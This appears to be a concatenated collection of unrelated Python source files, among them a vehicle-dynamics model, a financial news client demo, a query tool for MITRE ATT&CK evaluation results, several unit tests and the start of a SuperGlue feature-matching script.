beta = torch.tan(self.l_r*torch.atan(delta/(self.l_f + self.lr)))
fkin[:, 0] = (v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d) # s_dot
fkin[:, 1] = v_x * torch.sin(mu) + v_y * torch.cos(mu) # d_dot
fkin[:, 2] = v*torch.sin(beta)/self.l_r - kappa*((v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d))
v_dot = 1 / self.mass_long * (self.Cm1 * u[:, 0] - self.Cm2 * v_x * u[:, 0])
fkin[:, 3] = 1 / self.mass_long * (self.Cm1 * u[:, 0] - self.Cm2 * v_x * u[:, 0])
fkin[:, 4] = delta * fkin[:, 3] * self.l_r / (self.l_r + self.l_f)
fkin[:, 5] = delta * fkin[:, 3] / (self.l_r + self.l_f)
if lambda_blend ==0:
return fkin
if lambda_blend>0:
[F_rx, F_ry, F_fy] = self.forceModel(x, u)
f[:, 0] = (v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d)
f[:, 1] = v_x * torch.sin(mu) + v_y * torch.cos(mu)
f[:, 2] = r - kappa*((v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d))
f[:, 3] = 1 / self.mass_long * (F_rx - F_fy * torch.sin(delta) + self.mass * v_y * r)
f[:, 4] = 1 / self.mass * (F_ry + F_fy * torch.cos(delta) - self.mass * v_x * r)
f[:, 5] = 1 / self.I_z * (F_fy * self.l_f * torch.cos(delta) - F_ry * self.l_r + self.tv_p * (r_tar - r))
if lambda_blend ==1:
return f
return f*lambda_blend + (1-lambda_blend)*fkin
def dxCurve(self, x, u):
f = torch.empty(x.size(0), self.n_full_state)
s = x[:,0] #progress
d = x[:,1] #horizontal displacement
mu = x[:, 2] #orientation
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5] #yawrate
delta = u[:, 1]
r_tar = delta * v_x / (self.l_f + self.l_r)
[F_rx, F_ry, F_fy] = self.forceModel(x, u)
kappa = self.getCurvature(s)
f[:, 0] = (v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d)
f[:, 1] = v_x * torch.sin(mu) + v_y * torch.cos(mu)
f[:, 2] = r - kappa*((v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d))
f[:, 3] = 1 / self.mass_long * (F_rx - F_fy * torch.sin(delta) + self.mass * v_y * r)
f[:, 4] = 1 / self.mass * (F_ry + F_fy * torch.cos(delta) - self.mass * v_x * r)
f[:, 5] = 1 / self.I_z * (F_fy * self.l_f * torch.cos(delta) - F_ry * self.l_r + self.tv_p * (r_tar - r))
return f
def fromStoIndexBatch(self,s_in):
s = s_in
i_nan = (s != s)
i_nan += (s >= 1e10) + (s <= -1e10)
if torch.sum(i_nan) > 0:
for i in range(self.n_batch):
if i_nan[i]:
s[i] = 0
# s[i_nan] = torch.zeros(torch.sum(i_nan))
k = 0
if torch.max(s) > self.track_s[-1] or torch.min(s) < 0:
s = torch.fmod(s,self.track_s[-1])
# i_wrapdown = (s > self.track_s[-1]).type(torch.FloatTensor)
i_wrapup = (s < 0).type(torch.FloatTensor)
s = s + i_wrapup * self.track_s[-1]
if torch.max(s) > self.track_s[-1] or torch.min(s) < 0:
s = torch.max(s, torch.zeros(self.n_batch))
s = torch.min(s, self.track_s[-1] * torch.ones(self.n_batch))
# print(s-s_in)
index = (torch.floor(s / self.track.diff_s)).type(torch.LongTensor)
if torch.min(index) < 0:
print(index)
rela_proj = (s - self.track_s[index]) / self.track.diff_s
next_index = index + 1
i_index_wrap = (next_index < self.track.N).type(torch.LongTensor)
next_index = torch.fmod(next_index,self.track.N)# * i_index_wrap
return index, next_index, rela_proj
def getCurvature(self, s):
index, next_index, rela_proj = self.fromStoIndexBatch(s)
kappa = self.track_kappa[index] + rela_proj * (self.track_kappa[next_index] - self.track_kappa[index])
return kappa
def getTrackHeading(self,s):
index, next_index, rela_proj = self.fromStoIndexBatch(s)
phi = self.track_phi[index] + rela_proj * (self.track_phi[next_index] - self.track_phi[index])
return phi
def getLocalBounds(self,s):
index, next_index, rela_proj = self.fromStoIndexBatch(s)
d_upper = self.track_d_upper[index] + \
rela_proj * (self.track_d_upper[next_index] - self.track_d_upper[index])
d_lower = self.track_d_lower[index] +\
rela_proj * (self.track_d_lower[next_index] - self.track_d_lower[index])
angle_upper = self.track_angle_upper[index] + \
rela_proj * (self.track_angle_upper[next_index] - self.track_angle_upper[index])
angle_lower = self.track_angle_lower[index] + \
rela_proj * (self.track_angle_lower[next_index] - self.track_angle_lower[index])
return d_upper, d_lower,angle_upper,angle_lower
def fromLocalToGlobal(self,state_local,phi_ref):
s = state_local[:,0]
d = state_local[:,1]
mu = state_local[:,2]
v_x = state_local[:, 3]
v_y = state_local[:, 4]
r = state_local[:, 5]
index, next_index, rela_proj = self.fromStoIndexBatch(s)
vec_track = torch.empty(self.n_batch,2)
vec_track[:, 0] = (self.track_X[next_index] - self.track_X[index])* rela_proj
vec_track[:, 1] = (self.track_Y[next_index] - self.track_Y[index])* rela_proj
pos_index = torch.empty(self.n_batch,2)
pos_index[:, 0] = self.track_X[index]
pos_index[:, 1] = self.track_Y[index]
pos_center = pos_index + vec_track
phi_0 = self.track_phi[index]
# phi_1 = self.track_phi[next_index]
phi = phi_0
# phi = self.getTrackHeading(s)#self.track_phi[index] + rela_proj * (self.track_phi[next_index] - self.track_phi[index])
pos_global = torch.empty(self.n_batch,2)
pos_global[:, 0] = pos_center[:, 0] - d * torch.sin(phi)
pos_global[:, 1] = pos_center[:, 1] + d * torch.cos(phi)
heading = phi + mu
# heading = torch.fmod(heading,2*np.pi)
upwrap_index = ((phi_ref - heading)>1.5*np.pi).type(torch.FloatTensor)
downwrap_index = ((phi_ref - heading)<-1.5*np.pi).type(torch.FloatTensor)
heading = heading - 2*np.pi*downwrap_index + 2*np.pi*upwrap_index
upwrap_index = ((phi_ref - heading) > 1.5 * np.pi).type(torch.FloatTensor)
downwrap_index = ((phi_ref - heading) < -1.5 * np.pi).type(torch.FloatTensor)
heading = heading - 2 * np.pi * downwrap_index + 2 * np.pi * upwrap_index
x_global = torch.empty(self.n_batch,self.n_full_state)
x_global[:, 0] = pos_global[:, 0]
x_global[:, 1] = pos_global[:, 1]
x_global[:, 2] = heading
x_global[:, 3] = v_x
x_global[:, 4] = v_y
x_global[:, 5] = r
return x_global
def fromStoIndex(self, s):
s = torch.fmod(s,self.track_s[-1])
# if s > self.track_kappa[-1]:
# s = s - self.track_kappa[-1]
if s < 0:
s = s + self.track_s[-1]
elif s != s:
s = torch.tensor(0.0)
index = (torch.floor(s / self.track.diff_s)).type(torch.LongTensor)
rela_proj = (s - self.track_s[index]) / self.track.diff_s
return [index, rela_proj]
def wrapMu(self, mu):
if mu < -np.pi:
mu = mu + 2 * np.pi
elif mu > np.pi:
mu = mu - 2 * np.pi
return mu
|
499205
|
from pprint import pprint
from finnews.client import News
# Create a new instance of the News Client.
news_client = News()
# Grab the NASDAQ News Client.
nasdaq_news_client = news_client.nasdaq
# Grab the original content news.
content = nasdaq_news_client.original_content()
pprint(content)
# Grab the Commodity news.
content = nasdaq_news_client.commodities_feed()
pprint(content)
# Grab the IPO news.
content = nasdaq_news_client.ipos_feed()
pprint(content)
# Grab the Cryptocurrency news.
content = nasdaq_news_client.cryptocurrency_feed()
pprint(content)
# Grab the Dividends news.
content = nasdaq_news_client.dividends_feed()
pprint(content)
# Grab the Earnings news.
content = nasdaq_news_client.earnings_feed()
pprint(content)
# Grab the ETFs news.
content = nasdaq_news_client.etfs_feed()
pprint(content)
# Grab the Markets news.
content = nasdaq_news_client.markets_feed()
pprint(content)
# Grab the Options news.
content = nasdaq_news_client.options_feed()
pprint(content)
# Grab the Stocks news.
content = nasdaq_news_client.stocks_feed()
pprint(content)
# Grab the Artifical Intelligence news.
content = nasdaq_news_client.artifical_intelligence_feed()
pprint(content)
# Grab the Blockchain news.
content = nasdaq_news_client.blockchain_feed()
pprint(content)
# Grab the Corporate Governance news.
content = nasdaq_news_client.corporate_governance_feed()
pprint(content)
# Grab the Financial Advisors news.
content = nasdaq_news_client.financial_advisors_feed()
pprint(content)
# Grab the Fin Tech news.
content = nasdaq_news_client.fin_tech_feed()
pprint(content)
# Grab the Innovation news.
content = nasdaq_news_client.innovation_feed()
pprint(content)
# Grab the Nasdaq News Inc. news. -- NOT WORKING!!!!
content = nasdaq_news_client.nasdaq_news_feed()
pprint(content)
# Grab the Technology news.
content = nasdaq_news_client.technology_feed()
pprint(content)
# Grab the Investing news.
content = nasdaq_news_client.investing_feed()
pprint(content)
# Grab the Retirement news.
content = nasdaq_news_client.retirement_feed()
pprint(content)
# Grab the Saving Money news.
content = nasdaq_news_client.saving_money_feed()
pprint(content)
# Grab news articles for AAPL.
content = nasdaq_news_client.ticker_feed(ticker_symbol='AAPL')
pprint(content)
|
499213
|
import sys
from constants import SYMBOL
from db import create_engine, fetch_dataframe, plot_stats
def main():
engine = create_engine(SYMBOL)
dataframe = fetch_dataframe(SYMBOL, engine)
if dataframe is None:
raise Exception("Unable to fetch dataframe")
if len(sys.argv) == 2 and (sys.argv[1] == "--graph" or sys.argv[1] == "-g"):
plot_stats(SYMBOL, dataframe, "Price")
else:
print(dataframe)
if __name__ == "__main__":
main()
|
499247
|
import time
def get_bitsize(v):
return 1 << v
def get_timestamp():
now = int((time.time()) * 1000)
return now
def til_next_millis(last):
timestamp = get_timestamp()
while (timestamp <= last):
time.sleep(0.001)
timestamp = get_timestamp()
return timestamp
|
499254
|
import json
import glob
import os
import argparse
import sys
import re
class QueryAttackEval:
def __init__(self, args):
self.args = args
# this line is only to protect the object and should never trigger if running from this script
assert(self.args.technique or self.args.procedure or self.args.search)
def get_technique(self, technique_id):
print(f'{self.filename}')
technique = self.data[technique_id]
name = technique['TechniqueName']
print(f' {technique_id}: {name}')
for step_id, step in technique['Steps'].items():
if not len(step["Procedure"]):
continue
print(f' {step_id}) {step["Procedure"]}')
for detection in step['DetectionCategories']:
for k,v in detection.items():
k = k.strip()
if len(k):
print(f' {k}')
return
def get_procedure(self, procedure_id):
found_proc = False
print(f'{self.filename}')
for technique_id, technique in self.data.items():
if technique_id == 'PublicRelease':
continue
if procedure_id in technique['Steps']:
step = technique['Steps'][procedure_id]
if not len(step["Procedure"]):
continue
if not found_proc:
print(f' {procedure_id}) {step["Procedure"]}')
found_proc = True
print(f' {technique_id}: {technique["TechniqueName"]}')
for detection in step['DetectionCategories']:
for k,v in detection.items():
k = k.strip()
if len(k):
print(f' {k}')
return
def search_eval(self, substring):
techniques = []
procedures = []
detections = []
notes = []
for technique_id, technique in self.data.items():
if technique_id == 'PublicRelease':
continue
if self.args.technique and not technique_id == self.args.technique:
continue
if re.search(substring, technique['TechniqueName'], re.IGNORECASE):
techniques.append(f'{technique_id}:\t{technique["TechniqueName"]}')
for step_id, step in technique['Steps'].items():
if self.args.procedure and not step_id == self.args.procedure:
continue
if re.search(substring, step['Procedure'], re.IGNORECASE):
procedures.append('{:20}{}'.format(f'{step_id}:{technique_id})',step["Procedure"]))
for detection in step['DetectionCategories']:
for k,v in detection.items():
if re.search(substring, k, re.IGNORECASE):
detections.append('{:20}{}'.format(f'{step_id:}:{technique_id})', k))
if re.search(substring, v, re.IGNORECASE):
notes.append('{:20}{}\t{}'.format(f'{step_id}:{technique_id})', k, v))
if len(techniques) or len(procedures) or len(detections) or len(notes):
print(f'{self.filename}')
if len(techniques):
print('\n Techniques\n ----------')
for technique in techniques:
print(f' {technique}')
if len(procedures):
print('\n Procedures\n ----------')
for procedure in procedures:
print(f' {procedure}')
if len(detections):
print('\n Detections\n ----------')
for detection in detections:
print(f' {detection}')
if len(notes):
print('\n Detection Notes\n ---------------')
for note in notes:
print(f' {note}')
return
def run(self, infile):
if not re.search(args.vendor, infile, re.IGNORECASE):
return
else:
self.filename = infile
with open(self.filename) as json_data:
self.data = json.load(json_data)
if self.args.search:
self.search_eval(self.args.search)
elif self.args.technique:
self.get_technique(self.args.technique.upper())
elif args.procedure:
self.get_procedure(self.args.procedure.upper())
def parse_args():
parser = argparse.ArgumentParser(
description='Query utility for the MITRE ATT&CK Evaluations'
)
parser.add_argument(
'-t',
'--technique',
type=str,
help='Query based on the supplied ATT&CK Technique (example: $ python query_attack.py -t T1043)',
default=False
)
parser.add_argument(
'-p',
'--procedure',
type=str,
help='Query based on the supplied Step/Procedure (example: $ python query_attack.py -p 1.A.1)',
default=False
)
parser.add_argument(
'-s',
'--search',
type=str,
help='Query all descriptions for the supplied substring (example: $ python query_attack.py -s ipconfig)',
default=False
)
parser.add_argument(
'vendor',
type=str,
nargs='?',
help='Optional argument to allow you to filter down to a particular vendor (example: $ python query_attack.py -s tainted countertack)',
default='.'
)
args = parser.parse_args()
if not (args.technique or args.procedure or args.search):
parser.print_help()
return False
return args
if __name__ == '__main__':
args = parse_args()
if args:
attack = QueryAttackEval(args)
for infile in glob.glob(os.path.join('./data/', '*json')):
attack.run(infile)
|
499259
|
from civic_scraper.base.site import Site
def test_site_default():
"Site should receive a url"
class Example(Site):
pass
site = Example("https://foo.com")
assert hasattr(site, "url")
assert site.runtime.__class__.__name__ == "date"
assert not hasattr(site, "parser_kls")
def test_site_with_parser():
"Site accepts optional Parser class"
class Parser:
pass
class Example(Site):
pass
site = Example("https://foo.com", parser_kls=Parser)
assert hasattr(site, "parser_kls")
|
499323
|
from abc import ABC, abstractmethod
from random import randrange
from typing import List
class Observer(ABC):
@abstractmethod
def update(self, subject):
pass
class Subject(ABC):
@abstractmethod
def append(self, observer):
pass
@abstractmethod
def remove(self, observer):
pass
@abstractmethod
def notify(self):
pass
@abstractmethod
def get_content(self):
pass
class SubjectA(Subject):
def __init__(self):
self._observers = []
self.content = None
def append(self, observer: Observer):
self._observers.append(observer)
def remove(self, observer: Observer):
self._observers.remove(observer)
def notify(self):
for observer in self._observers:
observer.update(self)
def some_business_logic(self):
self.content = randrange(0, 10)
print("Current Content is -- > {}".format(self.content))
self.notify()
def get_content(self):
return self.content
class CustomerA(Observer):
def update(self, subject: Subject):
if subject.get_content() % 2 == 0 or subject.get_content() >= 5:
print("ConcreteObserverA: Reacted to the event")
class CustomerB(Observer):
def update(self, subject: Subject):
if subject.get_content() % 2 != 0 or subject.get_content() < 5:
print("ConcreteObserverB: Reacted to the event")
if __name__ == "__main__":
subject = SubjectA()
a = CustomerA()
subject.append(a)
b = CustomerB()
subject.append(b)
subject.some_business_logic()
subject.some_business_logic()
subject.remove(a)
subject.some_business_logic()
|
499329
|
import json
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, 'insights_hosts.json')) as data_file:
TEST_INSIGHTS_HOSTS = json.load(data_file)
with open(os.path.join(dir_path, 'insights.json')) as data_file:
TEST_INSIGHTS_PLANS = json.load(data_file)
with open(os.path.join(dir_path, 'insights_remediations.json')) as data_file:
TEST_INSIGHTS_REMEDIATIONS = json.load(data_file)['data']
|
499365
|
class QLayer():
def get_quant_weight(self):
raise NotImplementedError
def set_quant_weight(self):
raise NotImplementedError
def restore_weight(self):
raise NotImplementedError
|
499386
|
from bert_nli import BertNLIModel
if __name__ == '__main__':
bert_type = 'bert-base'
model = BertNLIModel('output/{}.state_dict'.format(bert_type), bert_type=bert_type)
sent_pairs = [('The lecturer committed plagiarism.','He was promoted.')]
labels, probs = model(sent_pairs)
print(labels)
print(probs)
|
499389
|
from django.conf import settings
def vault_settings(request):
return {
'DEBUG': settings.DEBUG,
'ENVIRON': settings.ENVIRON,
'HELP_URL': settings.HELP_URL,
'SWIFT_CLOUD_ENABLED': settings.SWIFT_CLOUD_ENABLED,
}
def vault_session(request):
return {
'logged_user': request.user,
'project_id': request.session.get('project_id'),
'project_name': request.session.get('project_name'),
'auth_token': request.session.get('auth_token'),
'is_superuser': request.user.is_superuser,
}
|
499393
|
from __future__ import absolute_import
from jinja2 import Markup
from changes.buildfailures.base import BuildFailure
class MissingTests(BuildFailure):
def get_html_label(self, build):
return Markup('Tests were expected for all results, but some or all were missing.')
|
499399
|
from evoflow.config import floatx, intx
def _infer_dtype(a):
"infers what tensor.dtype to use for a given variable during conversion"
if isinstance(a, int):
dtype = intx()
elif isinstance(a, float):
dtype = floatx()
elif isinstance(a, list):
have_float = False
for v in a:
if isinstance(v, float):
have_float = True
if have_float:
dtype = floatx()
else:
dtype = intx()
else:
raise ValueError("can't cast type:", type(a), 'to a tensor')
return dtype
|
499400
|
import pymongo
client = pymongo.MongoClient('mongodb://172.17.0.3:27017/')
db = client['diagram']
col = db["http2Form"]
http2 = {
'header': {
'filter': False, 'fields': [], 'ShowOnMainLine': False
},
'payload': {
'filter': False, 'fields': [], 'ShowOnMainLine': False
},
}
x = col.delete_one({"_id":1})
x = col.delete_one({"_id":2})
x = col.insert_one({"_id": 1, "http2": http2})
x = col.insert_one({"_id": 2, "http2": http2})
|
499407
|
from flask import Blueprint, Response, jsonify, request
from flask_cors import CORS
import requests
import json
pars = Blueprint('pars', __name__)
CORS(pars)
@pars.route('/parser', methods=['POST'])
def PARSER():
body = request.json
res = requests.post('http://localhost:8887/Query/Parser',json = body)
return json.loads(res.text)
@pars.route('/consultar', methods=['POST'])
def CONSULTAR():
body = request.json
print(body)
res = requests.post('http://localhost:8887/Query/Consultar',json = body)
print(res.text)
return json.loads(res.text)
@pars.route('/EDD/reportTBL',methods=['POST'])
def RepReportTBL():
body = request.json
res = requests.post('http://localhost:9998/REP/reportTBL',json = body)
return json.loads(res.text)
@pars.route('/EDD/reportDB',methods=['POST'])
def RepReportDB():
res = requests.post('http://localhost:9998/REP/reportDB')
return json.loads(res.text)
@pars.route('/EDD/reportAVL',methods=['POST'])
def RepReportAVL():
body = request.json
print(body)
res = requests.post('http://localhost:9998/REP/reportAVL',json = body)
return json.loads(res.text)
@pars.route('/EDD/reportTPL',methods=['POST'])
def RepReportTPL():
body = request.json
res = requests.post('http://localhost:9998/REP/reportTPL',json = body)
return json.loads(res.text)
@pars.route('/SHTABLE', methods=['POST'])
def SHTABLE():
body = request.json
res = requests.post('http://localhost:9998/TABLE/showTables',json = body)
return json.loads(res.text)
@pars.route('/prueba', methods=['GET'])
def PRUEBA():
return jsonify({"message":"Connected"})
|
499412
|
import pytest
from salesforce_api.const.service import VERB
from . import helpers
from salesforce_api import login, core, exceptions, const
class TestOAuth:
def create_connection(self, api_version: str = None):
return login.oauth2(
client_id=helpers.TEST_CLIENT_KEY,
client_secret=helpers.TEST_CLIENT_SECRET,
username=helpers.TEST_USER_EMAIL,
password=<PASSWORD>,
instance_url=helpers.TEST_INSTANCE_URL,
api_version=api_version
)
def test_authenticate_success(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/success.txt'), status_code=200)
connection = self.create_connection()
assert isinstance(connection, core.Connection)
assert connection.access_token == helpers.TEST_ACCESS_TOKEN
def test_authenticate_client_id_failure(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/invalid_client_id.txt'), status_code=400)
with pytest.raises(exceptions.AuthenticationInvalidClientIdError):
self.create_connection()
def test_authenticate_client_secret_failure(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/invalid_client_secret.txt'), status_code=400)
with pytest.raises(exceptions.AuthenticationInvalidClientSecretError):
self.create_connection()
def test_authenticate_invalid_grant_failure(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/invalid_grant.txt'), status_code=400)
with pytest.raises(exceptions.AuthenticationError):
self.create_connection()
def test_automatic_api_version(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/success.txt'), status_code=200)
connection = self.create_connection()
assert connection.version == const.API_VERSION
def test_manual_api_version(self, requests_mock):
expected_api_version = '123.4'
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/success.txt'), status_code=200)
connection = self.create_connection(expected_api_version)
assert connection.version == expected_api_version
class TestSoap(helpers.BaseTest):
def create_connection(self, api_version: str = None):
return login.soap(
instance_url=helpers.TEST_INSTANCE_URL,
username=helpers.TEST_USER_EMAIL,
password=<PASSWORD>,
security_token=helpers.TEST_SECURITY_TOKEN,
api_version=api_version
)
def test_authenticate_success(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/success.txt'))
connection = self.create_connection()
assert isinstance(connection, core.Connection)
assert connection.access_token == helpers.TEST_ACCESS_TOKEN
def test_authenticate_alt_password_success(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/success.txt'))
connection = login.soap(
instance_url=helpers.TEST_INSTANCE_URL,
username=helpers.TEST_USER_EMAIL,
password_and_security_token=helpers.TEST_PASSWORD
)
assert isinstance(connection, core.Connection)
assert connection.access_token == helpers.TEST_ACCESS_TOKEN
def test_authenticate_missing_token_failure(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/missing_token.txt'))
with pytest.raises(exceptions.AuthenticationMissingTokenError):
self.create_connection()
def test_automatic_api_version(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/success.txt'))
assert self.create_connection().version == const.API_VERSION
def test_manual_api_version(self, requests_mock):
expected_api_version = '123.4'
self.register_uri(requests_mock, VERB.POST, f'/services/Soap/c/{expected_api_version}', text=helpers.get_data('login/soap/success.txt', {'version': expected_api_version}))
assert self.create_connection(expected_api_version).version == expected_api_version
|
499497
|
from __future__ import absolute_import, unicode_literals
from celery.utils import encoding
class test_encoding:
def test_safe_str(self):
assert encoding.safe_str(object())
assert encoding.safe_str('foo')
def test_safe_repr(self):
assert encoding.safe_repr(object())
class foo(object):
def __repr__(self):
raise ValueError('foo')
assert encoding.safe_repr(foo())
|
499517
|
import uuid
from datetime import datetime as dt, timezone as tz
from typing import List
import pytest
from botx import ChatTypes, CommandTypes, EntityTypes
from botx.models.messages.incoming_message import Command, IncomingMessage, Sender
@pytest.mark.parametrize(
("body", "command", "arguments", "single_argument"),
[
("/command", "/command", (), ""),
("/command ", "/command", (), ""),
("/command arg", "/command", ("arg",), "arg"),
("/command arg ", "/command", ("arg",), "arg"),
("/command \t\t arg ", "/command", ("arg",), "arg"),
("/command arg arg", "/command", ("arg", "arg"), "arg arg"),
("/command arg arg ", "/command", ("arg", "arg"), "arg arg"),
],
)
def test_command_splits_right(
body: str,
command: str,
arguments: List[str],
single_argument: str,
) -> None:
command = Command(body=body, command_type=CommandTypes.user)
assert command.body == body
assert command.command == command.command
assert command.arguments == arguments
assert command.single_argument == command.single_argument
def test_command_data_as_dict() -> None:
command = Command(
body="/test",
command_type=CommandTypes.user,
data={"some": "data"},
)
assert command.data_dict == command.data == {"some": "data"}
def test_user_email_when_credentials_passed() -> None:
sender = Sender(
user_huid=uuid.uuid4(),
group_chat_id=uuid.uuid4(),
chat_type=ChatTypes.chat,
ad_login="user",
ad_domain="example.com",
username="test user",
is_admin=False,
is_creator=True,
host="cts.example.com",
)
assert sender.upn == "<EMAIL>"
def test_user_email_when_credentials_missed() -> None:
assert (
Sender(
group_chat_id=uuid.uuid4(),
chat_type=ChatTypes.chat,
is_admin=False,
is_creator=True,
host="cts.example.com",
).upn
is None
)
def test_skip_validation_for_file() -> None:
file_data = {"file_name": "zen.py", "data": "data:text/plain;base64,"}
IncomingMessage.parse_obj(
{
"sync_id": "a465f0f3-1354-491c-8f11-f400164295cb",
"command": {"body": "/cmd", "command_type": "user", "data": {}},
"file": file_data,
"from": {
"user_huid": None,
"group_chat_id": "8dada2c8-67a6-4434-9dec-570d244e78ee",
"ad_login": None,
"ad_domain": None,
"username": None,
"chat_type": "group_chat",
"host": "cts.ccteam.ru",
"is_admin": False,
"is_creator": False,
},
"bot_id": "dcfa5a7c-7cc4-4c89-b6c0-80325604f9f4",
},
)
def test_parse_message_forward() -> None:
inserted_at = dt(2020, 7, 10, 10, 12, 58, 420000, tzinfo=tz.utc)
IncomingMessage.parse_obj(
{
"bot_id": "f6615a30-9d3d-5770-b453-749ea562a974",
"command": {
"body": "Message body",
"command_type": CommandTypes.user,
"data": {},
"metadata": {},
},
"entities": [
{
"data": {
"forward_type": ChatTypes.chat,
"group_chat_id": "b51df4c1-3834-0949-1066-614ec424d28a",
"sender_huid": "4471289e-5b52-5c1b-8eab-a22c548fef9b",
"source_chat_name": "MessageAuthor Name",
"source_inserted_at": inserted_at,
"source_sync_id": "80d2c3a9-0031-50a8-aeed-32bb5d285758",
},
"type": EntityTypes.forward,
},
],
"file": None,
"sync_id": "eeb8eeca-3f31-5037-8b41-84de63909a31",
"user": {
"ad_domain": "ccsteam.ru",
"ad_login": "message.forwarder",
"chat_type": ChatTypes.chat,
"group_chat_id": "070d866f-fe5b-0222-2a9e-b7fc35c99465",
"host": "cts.ccsteam.ru",
"is_admin": True,
"is_creator": True,
"user_huid": "f16cdc5f-6366-5552-9ecd-c36290ab3d11",
"username": "MessageForwarder Name",
},
},
)
|
499575
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class AnnouncementsConfig(AppConfig):
"""
Katago Announcements app handles some messages for the front page of the site
"""
name = "src.apps.announcements"
verbose_name = _("Announcements")
def ready(self):
try:
import src.apps.announcements.signals # noqa F401
except ImportError:
pass
|
499609
|
import pytest
from apachelogs import InvalidDirectiveError, LogParser, UnknownDirectiveError
@pytest.mark.parametrize(
"fmt",
[
"%",
"% ",
"%^x",
"%^",
"%{param",
],
)
def test_malformed_directive(fmt):
with pytest.raises(InvalidDirectiveError) as excinfo:
LogParser(fmt)
assert str(excinfo.value) == f"Invalid log format directive at index 0 of {fmt!r}"
assert excinfo.value.pos == 0
assert excinfo.value.format == fmt
@pytest.mark.parametrize(
"fmt",
[
"%x",
"%^xx",
"%{param}z",
"%{x}a",
"%{x}b",
"%{%{x}a",
"%C",
],
)
def test_unknown_directive(fmt):
with pytest.raises(UnknownDirectiveError) as excinfo:
LogParser(fmt)
assert str(excinfo.value) == f"Unknown log format directive: {fmt!r}"
assert excinfo.value.directive == fmt
@pytest.mark.parametrize(
"fmt",
[
"%",
"% ",
"%^x",
"%^",
"%{param",
# '%{x}a', # actually parsed as an unknown directive
"%<a",
"%200a",
"%!a" "%!200a",
],
)
def test_malformed_time_directive(fmt):
with pytest.raises(InvalidDirectiveError) as excinfo:
LogParser("%{" + fmt + "}t")
assert str(excinfo.value) == f"Invalid log format directive at index 0 of {fmt!r}"
assert excinfo.value.pos == 0
assert excinfo.value.format == fmt
|
499624
|
import os
import sys
import cv2
import json
import fnmatch
import argparse
import numpy as np
from tqdm import tqdm
from scipy.spatial import cKDTree
import torch
from torch.utils.data.dataset import Dataset
from utils import *
sys.path.append('./SuperGlueMatching')
from models.utils import read_image
from models.superpoint import SuperPoint
from models.superglue import SuperGlue
def SuperGlueMatcher(model,
superpoints_0,
superpoints_1):
data = {
'descriptors0': superpoints_0['descriptors'][0].unsqueeze(0).cuda(),
'descriptors1': superpoints_1['descriptors'][0].unsqueeze(0).cuda(),
'keypoints0': superpoints_0['keypoints'][0].unsqueeze(0).cuda(),
'keypoints1': superpoints_1['keypoints'][0].unsqueeze(0).cuda(),
'scores0': superpoints_0['scores'][0].unsqueeze(0).cuda(),
'scores1': superpoints_1['scores'][0].unsqueeze(0).cuda(),
'image0': torch.zeros((1,1,480,640)),
'image1': torch.zeros((1,1,480,640)),
}
match = model(data)
confidence = match['matching_scores0'][0].detach().cpu().numpy()
matches = match['matches0'][0].cpu().numpy()
kpts0 = superpoints_0['keypoints'][0].cpu().numpy()
kpts1 = superpoints_1['keypoints'][0].cpu().numpy()
valid = matches > -1
mkpts0 = kpts0[valid]
mkpts1 = kpts1[matches[valid]]
ind0 = np.nonzero(valid)[0]
ind1 = matches[valid]
confidence = confidence[valid]
return mkpts0, mkpts1, ind0, ind1, confidence
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Extract and track keypoints throughout the video using SuperGlue.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--input_pairs', type=str, default='assets/scannet_sample_pairs_with_gt.txt',
help='Path to the list of image pairs')
parser.add_argument(
'--input_dir', type=str, default='assets/scannet_sample_images/',
help='Path to the directory that contains the images')
parser.add_argument(
'--output_dir', type=str, default='dump_match_pairs/',
help='Path to the directory in which the .npz results and optionally,'
'the visualization images are written')
parser.add_argument(
'--max_length', type=int, default=-1,
help='Maximum number of pairs to evaluate')
parser.add_argument(
'--resize', type=int, nargs='+', default=[640, 480],
help='Resize the input image before running inference. If two numbers, '
'resize to the exact dimensions, if one number, resize the max '
'dimension, if -1, do not resize')
parser.add_argument(
'--resize_float', action='store_true',
help='Resize the image after casting uint8 to float')
parser.add_argument(
'--superglue', choices={'indoor', 'outdoor'}, default='indoor',
help='SuperGlue weights')
parser.add_argument(
'--max_keypoints', type=int, default=1024,
help='Maximum number of keypoints detected by Superpoint'
' (\'-1\' keeps all keypoints)')
parser.add_argument(
'--keypoint_threshold', type=float, default=0.005,
help='SuperPoint keypoint detector confidence threshold')
parser.add_argument(
'--nms_radius', type=int, default=4,
help='SuperPoint Non Maximum Suppression (NMS) radius'
' (Must be positive)')
parser.add_argument(
'--sinkhorn_iterations', type=int, default=20,
help='Number of Sinkhorn iterations performed by SuperGlue')
parser.add_argument(
'--match_threshold', type=float, default=0.2,
help='SuperGlue match threshold')
parser.add_argument(
'--extract_descriptor', action='store_true')
parser.add_argument(
'--ego_dataset_folder', type=str,
help='Ego dataset folder')
opt = parser.parse_args()
print(opt)
config = {
'superpoint': {
